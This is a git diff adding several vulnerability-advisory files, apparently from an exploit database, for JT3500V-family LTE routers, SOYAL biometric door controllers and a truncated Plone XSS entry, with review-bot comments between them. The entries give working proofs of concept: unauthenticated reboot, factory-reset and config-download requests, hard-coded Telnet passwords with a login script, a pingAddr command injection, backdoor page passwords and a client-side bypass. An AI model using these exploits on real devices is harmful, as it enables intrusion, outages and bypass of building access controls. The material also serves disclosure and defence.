diff --git a/exploits/hardware/dos/49685.txt b/exploits/hardware/dos/49685.txt
new file mode 100644
index 000000000..289b28d56
--- /dev/null
+++ b/exploits/hardware/dos/49685.txt
@@ -0,0 +1,68 @@
+# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)
+# Date: 03.02.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
+
+Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
+Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
+ http://www.jatontec.com/products/show.php?itemid=258
+ http://www.jatontech.com/CAT12.html#_pp=105_564
+ http://www.kzbtech.com/AM3300V.html
+ https://neotel.mk/ostanati-paketi-2/
+
+Affected version: Model | Firmware
+ -------|---------
+ JT3500V | 2.0.1B1064
+ JT3300V | 2.0.1B1047
+ AM6200M | 2.0.0B3210
+ AM6000N | 2.0.0B3042
+ AM5000W | 2.0.0B3037
+ AM4200M | 2.0.0B2996
+ AM4100V | 2.0.0B2988
+ AM3500MW | 2.0.0B1092
+ AM3410V | 2.0.0B1085
+ AM3300V | 2.0.0B1060
+ AM3100E | 2.0.0B981
+ AM3100V | 2.0.0B946
+ AM3000M | 2.0.0B21
+ KZ7621U | 2.0.0B14
+ KZ3220M | 2.0.0B04
+ KZ3120R | 2.0.0B01
+
+Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
+& VoIP CPE product specially designed to enable quick and easy
+LTE fixed data service deployment for residential and SOHO customers.
+It provides high speed LAN, Wi-Fi and VoIP integrated services
+to end users who need both bandwidth and multi-media data service
+in residential homes or enterprises. The device has 2 Gigabit LAN
+ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
+CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
+and firewall software for security. It provides an effective
+all-in-one solution to SOHO or residential customers. It can
+deliver up to 1Gbps max data throughput which can be very
+competitive to wired broadband access service.
+
+Desc: The device allows unauthenticated attackers to restart the
+device with an HTTP GET request to /goform/RestartDevice page.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+ Linux 2.6.36+ (mips)
+ Mediatek APSoC SDK v4.3.1.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5643
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5643.php
+
+
+03.02.2021
+
+--
+
+
+$ curl -sk https://192.168.1.1/goform/RestartDevice
+success
+$
\ No newline at end of file
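Review bot: The advisory ends at the proof of concept and carries no vendor-status or mitigation line, so an operator of the sixteen listed models has nothing to act on. The Desc states that the reboot is reached by an unauthenticated GET to `/goform/RestartDevice`; a line such as `Mitigation: restrict the web management interface to trusted hosts until fixed firmware is available` would fit after the Desc paragraph. Because the action is a plain GET without authentication, it is presumably also reachable cross-site from a LAN user's browser, which the text should state if confirmed. The same gap applies to 49684.txt (`/goform/LoadDefaultSettings`) and to the other JT3500V advisories in this commit.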
diff --git a/exploits/hardware/remote/49682.txt b/exploits/hardware/remote/49682.txt
new file mode 100644
index 000000000..fbd46f841
--- /dev/null
+++ b/exploits/hardware/remote/49682.txt
@@ -0,0 +1,92 @@
+# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
+# Date: 03.02.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
+
+Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
+Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
+ http://www.jatontec.com/products/show.php?itemid=258
+ http://www.jatontech.com/CAT12.html#_pp=105_564
+ http://www.kzbtech.com/AM3300V.html
+ https://neotel.mk/ostanati-paketi-2/
+
+Affected version: Model | Firmware
+ -------|---------
+ JT3500V | 2.0.1B1064
+ JT3300V | 2.0.1B1047
+ AM6200M | 2.0.0B3210
+ AM6000N | 2.0.0B3042
+ AM5000W | 2.0.0B3037
+ AM4200M | 2.0.0B2996
+ AM4100V | 2.0.0B2988
+ AM3500MW | 2.0.0B1092
+ AM3410V | 2.0.0B1085
+ AM3300V | 2.0.0B1060
+ AM3100E | 2.0.0B981
+ AM3100V | 2.0.0B946
+ AM3000M | 2.0.0B21
+ KZ7621U | 2.0.0B14
+ KZ3220M | 2.0.0B04
+ KZ3120R | 2.0.0B01
+
+Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
+& VoIP CPE product specially designed to enable quick and easy
+LTE fixed data service deployment for residential and SOHO customers.
+It provides high speed LAN, Wi-Fi and VoIP integrated services
+to end users who need both bandwidth and multi-media data service
+in residential homes or enterprises. The device has 2 Gigabit LAN
+ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
+CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
+and firewall software for security. It provides an effective
+all-in-one solution to SOHO or residential customers. It can
+deliver up to 1Gbps max data throughput which can be very
+competitive to wired broadband access service.
+
+Desc: The device utilizes hard-coded credentials within its Linux
+distribution image. These sets of credentials are never exposed to
+the end-user and cannot be changed through any normal operation of
+the router.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+ Linux 2.6.36+ (mips)
+ Mediatek APSoC SDK v4.3.1.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5637
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5637.php
+
+
+03.02.2021
+
+--
+
+
+Default web creds:
+------------------
+admin:admin123
+user:user123
+
+Telnet/SSH access:
+------------------
+admin:root123
+
+===
+
+import telnetlib
+
+host="192.168.1.1"
+user="admin"
+password="root123"
+s=telnetlib.Telnet(host)
+s.read_until(b"CPE login: ")
+s.write(user.encode('ascii') + b"\n")
+s.read_until(b"Password: ")
+s.write(password.encode('ascii') + b"\n")
+s.write(b"busybox\n")
+print(s.read_all().decode('ascii'))
+s.mt_interact()
+s.close()
\ No newline at end of file
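Review bot: The two credential lists after the `--` separator are not tied back to the Desc paragraph, which says the credentials "cannot be changed through any normal operation of the router". The first list is headed `Default web creds`, which reads like user-changeable defaults, while the second is the Telnet/SSH account; a short label on each list (changeable default or fixed in the firmware image) would tell a defender whether a password change helps or whether Telnet/SSH has to be filtered at the network instead. The advisory also does not say whether Telnet/SSH listens on the WAN side by default, which decides the exposure.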
diff --git a/exploits/hardware/webapps/49676.txt b/exploits/hardware/webapps/49676.txt
new file mode 100644
index 000000000..046a39548
--- /dev/null
+++ b/exploits/hardware/webapps/49676.txt
@@ -0,0 +1,53 @@
+# Exploit Title: SOYAL Biometric Access Control System 5.0 - Master Code Disclosure
+# Date: 25.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com
+
+Vendor: SOYAL Technology Co., Ltd
+Product web page: https://www.soyal.com.tw | https://www.soyal.com
+Affected version: AR-727 i/CM - F/W: 5.0
+ AR837E/EF - F/W: 4.3
+ AR725Ev2 - F/W: 4.3 191231
+ AR331/725E - F/W: 4.2
+ AR837E/EF - F/W: 4.1
+ AR-727CM /i - F/W: 4.09
+ AR-727CM /i - F/W: 4.06
+ AR-837E - F/W: 3.03
+
+Summary: Soyal Access systems are built into Raytel Door Entry Systems
+and are providing access and lift control to many buildings from public
+and private apartment blocks to prestigious public buildings.
+
+Desc: The controller suffers from a cleartext transmission of sensitive
+information. This allows interception of the HTTP traffic and disclose
+the Master code and the Arming code via a man-in-the-middle attack. An
+attacker can obtain these codes to enter into the controller's Programming
+mode and bypass physical security controls in place.
+
+Tested on: SOYAL Technology WebServer 2.0
+ SOYAL Serial Device Server 4.03A
+ SOYAL Serial Device Server 4.01n
+ SOYAL Serial Device Server 3.07n
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5630
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5630.php
+
+
+25.01.2021
+
+--
+
+
+$ curl 'http://192.168.1.1/CtrlParam.htm' \
+ -H 'Authorization: Basic YWRtaW46' | \
+ grep -ni -B1 'masterCode\|armCode'
+
+
Master Code (6 Digital) |
+ |
+ Arming Code (4 Digital) |
+ |
\ No newline at end of file
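Review bot: The request in the PoC sends `Authorization: Basic YWRtaW46`, which decodes to user `admin` with an empty password, yet the Desc covers only cleartext transmission. If the controller ships with a blank admin password, that is a separate finding and the mitigation differs (set an admin password as well as protecting the transport), so the Desc should say which precondition applies. The output block after the command also appears to have lost its markup in this view: the `Master Code` and `Arming Code` rows show only `|`, so the page no longer shows what is actually disclosed.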
diff --git a/exploits/hardware/webapps/49677.html b/exploits/hardware/webapps/49677.html
new file mode 100644
index 000000000..1e54b1d2f
--- /dev/null
+++ b/exploits/hardware/webapps/49677.html
@@ -0,0 +1,65 @@
+# Exploit Title: SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF
+# Date: 25.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com
+
+Vendor: SOYAL Technology Co., Ltd
+Product web page: https://www.soyal.com.tw | https://www.soyal.com
+Affected version: AR-727 i/CM - F/W: 5.0
+ AR837E/EF - F/W: 4.3
+ AR725Ev2 - F/W: 4.3 191231
+ AR331/725E - F/W: 4.2
+ AR837E/EF - F/W: 4.1
+ AR-727CM /i - F/W: 4.09
+ AR-727CM /i - F/W: 4.06
+ AR-837E - F/W: 3.03
+
+Summary: Soyal Access systems are built into Raytel Door Entry Systems
+and are providing access and lift control to many buildings from public
+and private apartment blocks to prestigious public buildings.
+
+Desc: The application interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the
+requests. This can be exploited to perform certain actions with administrative
+privileges if a logged-in user visits a malicious web site.
+
+Tested on: SOYAL Technology WebServer 2.0
+ SOYAL Serial Device Server 4.03A
+ SOYAL Serial Device Server 4.01n
+ SOYAL Serial Device Server 3.07n
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5632
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5632.php
+
+
+25.01.2021
+
+--
+
+
+
+
+
+
+
+
+...
+
+
+
+
+
+
\ No newline at end of file
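Review bot: The file is added as `.html`, but it opens with `#`-prefixed metadata and free text that is not inside an HTML comment, so it is not a well-formed HTML document; the header through the `--` separator belongs in a single comment block at the top. As shown here, the section after `--` holds only blank lines and `...`, so the markup was presumably stripped and cannot be reviewed from this view. The Desc would also be more useful to the vendor if it named the missing control, for example `no anti-CSRF token or Origin check on the password-change request`.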
diff --git a/exploits/hardware/webapps/49680.txt b/exploits/hardware/webapps/49680.txt
new file mode 100644
index 000000000..701429924
--- /dev/null
+++ b/exploits/hardware/webapps/49680.txt
@@ -0,0 +1,83 @@
+# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
+# Date: 03.02.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
+
+Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
+Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
+ http://www.jatontec.com/products/show.php?itemid=258
+ http://www.jatontech.com/CAT12.html#_pp=105_564
+ http://www.kzbtech.com/AM3300V.html
+ https://neotel.mk/ostanati-paketi-2/
+
+Affected version: Model | Firmware
+ -------|---------
+ JT3500V | 2.0.1B1064
+ JT3300V | 2.0.1B1047
+ AM6200M | 2.0.0B3210
+ AM6000N | 2.0.0B3042
+ AM5000W | 2.0.0B3037
+ AM4200M | 2.0.0B2996
+ AM4100V | 2.0.0B2988
+ AM3500MW | 2.0.0B1092
+ AM3410V | 2.0.0B1085
+ AM3300V | 2.0.0B1060
+ AM3100E | 2.0.0B981
+ AM3100V | 2.0.0B946
+ AM3000M | 2.0.0B21
+ KZ7621U | 2.0.0B14
+ KZ3220M | 2.0.0B04
+ KZ3120R | 2.0.0B01
+
+Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
+& VoIP CPE product specially designed to enable quick and easy
+LTE fixed data service deployment for residential and SOHO customers.
+It provides high speed LAN, Wi-Fi and VoIP integrated services
+to end users who need both bandwidth and multi-media data service
+in residential homes or enterprises. The device has 2 Gigabit LAN
+ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
+CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
+and firewall software for security. It provides an effective
+all-in-one solution to SOHO or residential customers. It can
+deliver up to 1Gbps max data throughput which can be very
+competitive to wired broadband access service.
+
+Desc: The application suffers from an authenticated OS command
+injection vulnerability. This can be exploited to inject and
+execute arbitrary shell commands through the 'pingAddr' HTTP
+POST parameter bypassing the injection protection filter.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+ Linux 2.6.36+ (mips)
+ Mediatek APSoC SDK v4.3.1.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5635
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php
+
+
+03.02.2021
+
+--
+
+
+#JT3300V/AM3300V
+lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
+ --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
+ -H "Cookie: kz_userid=admin:311139" \
+ -H "X-Requested-With: XMLHttpRequest"
+ping: bad address 'Linux'
+lqwrm@metalgear:~/prive$
+
+
+#JT3500V
+lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
+ --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
+ -H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \
+ -H "X-Requested-With: XMLHttpRequest"
+ping: bad address 'Linux'
+lqwrm@metalgear:~/prive$
\ No newline at end of file
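Review bot: The Desc refers to an "injection protection filter" on `pingAddr` but never says what the filter rejects or why the value in the transcript passes it, so a firmware maintainer cannot tell what to fix. A root-cause sentence is needed: the response `ping: bad address 'Linux'` shows the parameter was evaluated by a shell before ping ran, and the fix direction is to validate `pingAddr` as an IP address or hostname and invoke ping without a shell. The two transcripts also embed concrete session cookie values; a placeholder such as `Cookie: SESSION_COOKIE_PLACEHOLDER` documents the authenticated precondition equally well.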
diff --git a/exploits/hardware/webapps/49681.txt b/exploits/hardware/webapps/49681.txt
new file mode 100644
index 000000000..25cbf7485
--- /dev/null
+++ b/exploits/hardware/webapps/49681.txt
@@ -0,0 +1,89 @@
+# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass
+# Date: 03.02.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
+
+Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
+Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
+ http://www.jatontec.com/products/show.php?itemid=258
+ http://www.jatontech.com/CAT12.html#_pp=105_564
+ http://www.kzbtech.com/AM3300V.html
+ https://neotel.mk/ostanati-paketi-2/
+
+Affected version: Model | Firmware
+ -------|---------
+ JT3500V | 2.0.1B1064
+ JT3300V | 2.0.1B1047
+ AM6200M | 2.0.0B3210
+ AM6000N | 2.0.0B3042
+ AM5000W | 2.0.0B3037
+ AM4200M | 2.0.0B2996
+ AM4100V | 2.0.0B2988
+ AM3500MW | 2.0.0B1092
+ AM3410V | 2.0.0B1085
+ AM3300V | 2.0.0B1060
+ AM3100E | 2.0.0B981
+ AM3100V | 2.0.0B946
+ AM3000M | 2.0.0B21
+ KZ7621U | 2.0.0B14
+ KZ3220M | 2.0.0B04
+ KZ3120R | 2.0.0B01
+
+Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
+& VoIP CPE product specially designed to enable quick and easy
+LTE fixed data service deployment for residential and SOHO customers.
+It provides high speed LAN, Wi-Fi and VoIP integrated services
+to end users who need both bandwidth and multi-media data service
+in residential homes or enterprises. The device has 2 Gigabit LAN
+ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
+CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
+and firewall software for security. It provides an effective
+all-in-one solution to SOHO or residential customers. It can
+deliver up to 1Gbps max data throughput which can be very
+competitive to wired broadband access service.
+
+Desc: The application suffers from an authentication bypass
+vulnerability. An unauthenticated attacker can disclose sensitive
+and clear-text information resulting in authentication bypass by
+downloading the configuration of the device and revealing the
+admin password.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+ Linux 2.6.36+ (mips)
+ Mediatek APSoC SDK v4.3.1.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5636
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5636.php
+
+
+03.02.2021
+
+--
+
+
+$ curl -s \
+ -o configtest.zlib \ # Default: config.dat
+ 'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \
+ binwalk -e configtest.zlib ; \
+ cd _configtest.zlib_extracted ; \
+ strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \
+ # cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device
+ cd ..
+
+3:Login=admin
+4:Password=neotelwings
+5:TelnetPwd=root123
+6:GuestId=user
+7:GuestPassword=user123
+89:DDNSPassword=
+239:auto_update_password=
+279:Tr069_Password=
+288:Tr069_ConnectionRequestPassword=admin
+300:Tr069_STUNPassword=
+339:telnetManagement=2
+$
\ No newline at end of file
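Review bot: This advisory and 49686.txt both describe the unauthenticated `export_settings.cgi` download, but neither references the other, and they use different listeners (`http://192.168.1.1:8080` here, `https://192.168.1.1` in 49686.txt). A `Related: ZSL-2021-5644` line, plus a sentence on whether both listeners are enabled by default, would let a defender scope the exposure once. The listed output shows that the export contains several secrets beyond the admin login (`TelnetPwd`, `GuestPassword`, `Tr069_ConnectionRequestPassword`), so the text should state that every credential in the export needs rotating after a fix, not only the admin password.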
diff --git a/exploits/hardware/webapps/49683.txt b/exploits/hardware/webapps/49683.txt
new file mode 100644
index 000000000..a2e29abb8
--- /dev/null
+++ b/exploits/hardware/webapps/49683.txt
@@ -0,0 +1,124 @@
+# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
+# Date: 03.02.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
+
+Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
+Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
+ http://www.jatontec.com/products/show.php?itemid=258
+ http://www.jatontech.com/CAT12.html#_pp=105_564
+ http://www.kzbtech.com/AM3300V.html
+ https://neotel.mk/ostanati-paketi-2/
+
+Affected version: Model | Firmware
+ -------|---------
+ JT3500V | 2.0.1B1064
+ JT3300V | 2.0.1B1047
+ AM6200M | 2.0.0B3210
+ AM6000N | 2.0.0B3042
+ AM5000W | 2.0.0B3037
+ AM4200M | 2.0.0B2996
+ AM4100V | 2.0.0B2988
+ AM3500MW | 2.0.0B1092
+ AM3410V | 2.0.0B1085
+ AM3300V | 2.0.0B1060
+ AM3100E | 2.0.0B981
+ AM3100V | 2.0.0B946
+ AM3000M | 2.0.0B21
+ KZ7621U | 2.0.0B14
+ KZ3220M | 2.0.0B04
+ KZ3120R | 2.0.0B01
+
+Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
+& VoIP CPE product specially designed to enable quick and easy
+LTE fixed data service deployment for residential and SOHO customers.
+It provides high speed LAN, Wi-Fi and VoIP integrated services
+to end users who need both bandwidth and multi-media data service
+in residential homes or enterprises. The device has 2 Gigabit LAN
+ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
+CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
+and firewall software for security. It provides an effective
+all-in-one solution to SOHO or residential customers. It can
+deliver up to 1Gbps max data throughput which can be very
+competitive to wired broadband access service.
+
+Desc: The device has several backdoors and hidden pages that
+allow remote code execution, overwriting of the bootrom and
+enabling debug mode.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+ Linux 2.6.36+ (mips)
+ Mediatek APSoC SDK v4.3.1.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5639
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php
+
+
+03.02.2021
+
+--
+
+
+Older and newer models defer in backdoor code.
+By navigating to /syscmd.html or /syscmd.asp pages
+an attacker can authenticate and execute system
+commands with highest privileges.
+
+Old models (syscmd.asp) password: super1234
+
+Newer models (syscmd.html) password: md5(WAN_MAC+version):
+
+$ curl -k https://192.168.1.1/goform/getImgVersionInfo
+{"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]}
+
+...
+pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR");
+ if (*pcVar6 == 0) {
+ pcVar6 = "6C:AD:EF:00:00:01";
+ }
+ memset(acStack280,0,0x100);
+ sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210");
+ ...
+ psMd5Init(auStack112);
+ psMd5Update(auStack112,local_10,local_c);
+ psMd5Final(auStack112,uParm1);
+ return;
+...
+
+
+Another 2 backdoors exist using the websCheckCookie() and specific header strings.
+
+...
+ iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb);
+ if (iVar2 != 0) {
+ return 0xffffffff;
+ }
+ if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) &&
+ (iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) {
+ return 0xffffffff;
+ ...
+ if (iVar1 != 0) goto LAB_0047c304;
+LAB_0047c32c:
+ WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1);
+LAB_0047c35c:
+ __n = strlen(__s1);
+ if (__n == 0) {
+ snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log");
+ WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560);
+ system(acStack1560);
+ websWrite(iParm1,"invalid command!");
+ goto LAB_0047c3f8;
+ }
+...
+
+
+Bypass the backdoor password request and enable debug mode from within the web console:
+
+$('#div_check').modal('hide'); <--- syscmd.html
+
+g_password_check_alert.close(); <--- syscmd.asp
\ No newline at end of file
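Review bot: `Older and newer models defer in backdoor code.` should read `differ`. The advisory lists three separate mechanisms (the `syscmd` pages, the header-string checks in the decompiled `websCheckCookie()` path, and the password prompt that the last section dismisses from the web console) but gives no remediation for any of them. The last section implies that the password prompt is enforced only in page script; stating that explicitly would make clear to the vendor that the check has to be enforced in the request handler. The decompiled fragments are also unlabelled, so naming the binary and function each excerpt comes from would make the finding verifiable against a firmware image.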
diff --git a/exploits/hardware/webapps/49684.txt b/exploits/hardware/webapps/49684.txt
new file mode 100644
index 000000000..b615d64e3
--- /dev/null
+++ b/exploits/hardware/webapps/49684.txt
@@ -0,0 +1,72 @@
+# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)
+# Date: 03.02.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
+
+Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
+Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
+ http://www.jatontec.com/products/show.php?itemid=258
+ http://www.jatontech.com/CAT12.html#_pp=105_564
+ http://www.kzbtech.com/AM3300V.html
+ https://neotel.mk/ostanati-paketi-2/
+
+Affected version: Model | Firmware
+ -------|---------
+ JT3500V | 2.0.1B1064
+ JT3300V | 2.0.1B1047
+ AM6200M | 2.0.0B3210
+ AM6000N | 2.0.0B3042
+ AM5000W | 2.0.0B3037
+ AM4200M | 2.0.0B2996
+ AM4100V | 2.0.0B2988
+ AM3500MW | 2.0.0B1092
+ AM3410V | 2.0.0B1085
+ AM3300V | 2.0.0B1060
+ AM3100E | 2.0.0B981
+ AM3100V | 2.0.0B946
+ AM3000M | 2.0.0B21
+ KZ7621U | 2.0.0B14
+ KZ3220M | 2.0.0B04
+ KZ3120R | 2.0.0B01
+
+Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
+& VoIP CPE product specially designed to enable quick and easy
+LTE fixed data service deployment for residential and SOHO customers.
+It provides high speed LAN, Wi-Fi and VoIP integrated services
+to end users who need both bandwidth and multi-media data service
+in residential homes or enterprises. The device has 2 Gigabit LAN
+ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
+CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
+and firewall software for security. It provides an effective
+all-in-one solution to SOHO or residential customers. It can
+deliver up to 1Gbps max data throughput which can be very
+competitive to wired broadband access service.
+
+Desc: The device allows unauthenticated attackers to visit the
+unprotected /goform/LoadDefaultSettings endpoint and reset the
+device to its factory default settings. Once the GET request is
+made, the device will reboot with its default settings allowing
+the attacker to bypass authentication and take full control of
+the system.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+ Linux 2.6.36+ (mips)
+ Mediatek APSoC SDK v4.3.1.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5642
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5642.php
+
+
+03.02.2021
+
+--
+
+
+$ curl -sk https://192.168.1.1/goform/LoadDefaultSettings
+success
+$
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49686.txt b/exploits/hardware/webapps/49686.txt
new file mode 100644
index 000000000..043197b21
--- /dev/null
+++ b/exploits/hardware/webapps/49686.txt
@@ -0,0 +1,70 @@
+# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
+# Date: 03.02.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
+
+Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
+Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
+ http://www.jatontec.com/products/show.php?itemid=258
+ http://www.jatontech.com/CAT12.html#_pp=105_564
+ http://www.kzbtech.com/AM3300V.html
+ https://neotel.mk/ostanati-paketi-2/
+
+Affected version: Model | Firmware
+ -------|---------
+ JT3500V | 2.0.1B1064
+ JT3300V | 2.0.1B1047
+ AM6200M | 2.0.0B3210
+ AM6000N | 2.0.0B3042
+ AM5000W | 2.0.0B3037
+ AM4200M | 2.0.0B2996
+ AM4100V | 2.0.0B2988
+ AM3500MW | 2.0.0B1092
+ AM3410V | 2.0.0B1085
+ AM3300V | 2.0.0B1060
+ AM3100E | 2.0.0B981
+ AM3100V | 2.0.0B946
+ AM3000M | 2.0.0B21
+ KZ7621U | 2.0.0B14
+ KZ3220M | 2.0.0B04
+ KZ3120R | 2.0.0B01
+
+Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
+& VoIP CPE product specially designed to enable quick and easy
+LTE fixed data service deployment for residential and SOHO customers.
+It provides high speed LAN, Wi-Fi and VoIP integrated services
+to end users who need both bandwidth and multi-media data service
+in residential homes or enterprises. The device has 2 Gigabit LAN
+ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
+CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
+and firewall software for security. It provides an effective
+all-in-one solution to SOHO or residential customers. It can
+deliver up to 1Gbps max data throughput which can be very
+competitive to wired broadband access service.
+
+Desc: JT3500V is vulnerable to unauthenticated configuration disclosure
+when direct object reference is made to the export_settings.cgi file
+using an HTTP GET request. This will enable the attacker to disclose
+sensitive information and help her in authentication bypass, privilege
+escalation and full system access.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+ Linux 2.6.36+ (mips)
+ Mediatek APSoC SDK v4.3.1.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5644
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5644.php
+
+
+03.02.2021
+
+--
+
+
+$ curl -sk -O https://192.168.1.1/cgi-bin/export_settings.cgi; ls -alsth config.dat
+8.0K -rw-rw-r-- 1 teppei teppei 5.5K Feb 4 11:31 config.dat
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49668.txt b/exploits/multiple/webapps/49668.txt
new file mode 100644
index 000000000..c8a33719f
--- /dev/null
+++ b/exploits/multiple/webapps/49668.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Plone CMS 5.2.3 - 'Title' Stored XSS
+# Date: 18-03-2021
+# Exploit Author: Piyush Patil
+# Vendor Homepage: https://plone.com/
